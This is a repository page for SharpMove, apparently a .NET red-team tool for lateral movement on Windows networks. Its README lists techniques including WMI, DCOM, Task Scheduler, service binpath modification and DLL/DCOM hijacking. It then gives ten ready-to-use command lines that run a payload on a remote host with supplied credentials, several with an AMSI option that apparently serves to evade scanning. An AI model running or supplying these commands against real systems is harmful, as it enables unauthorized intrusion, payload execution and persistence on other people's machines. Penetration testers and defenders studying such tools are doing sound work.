• Stars
    star
    368
  • Rank 115,958 (Top 3 %)
  • Language
    C#
  • License
    GNU General Publi...
  • Created almost 5 years ago
  • Updated almost 2 years ago

Reviews

There are no reviews yet. Be the first to send feedback to the community and the maintainers!

Repository Details

.NET Project for performing Authenticated Remote Execution

SharpMove - .NET authenticated execution for remote hosts

Building

To compile open Visual Studio project and compile for release.

Options

  • WMI
  • SCM
  • DCOM (Multiple)
  • Task Scheduler
  • Service DLL Hijack
  • DCOM Server Hijack
  • Modify Scheduled Task
  • Modify Service binpath
SharpMove.exe action=query computername=remote.host.local query="select * from win32_process" username=domain\user password=password
SharpMove.exe action=create computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true username=domain\user password=password
SharpMove.exe action=executevbs computername=remote.host.local eventname=Debug amsi=true username=domain\\user password=password
SharpMove.exe action=taskscheduler computername=remote.host.local command="C:\windows\temp\payload.exe" taskname=Debug amsi=true username=domain\\user password=password
SharpMove.exe action=dcom computername=remote.host.local command="C:\windows\temp\payload.exe\" method=ShellBrowserWindow amsi=true
SharpMove.exe action=scm computername=remote.host.local command="C:\windows\temp\payload.exe" servicename=WindowsDebug amsi=true
SharpMove.exe action=modsvc computername=remote.host.local command="C:\windows\temp\payload.exe" amsi=true servicename=TestService
SharpMove.exe action=modschtask computername=remote.host.local command="C:\windows\temp\payload.exe" username=domain\user password=password taskname=TestTask
SharpMove.exe action=hijackdcom computername=remote.host.local clsid={40bdc4e5-d532-42e6-b667-1ab890fdebcf}
SharpMove.exe action=startservice computername=remote.host.local servicename=TestService

Part of MoveKit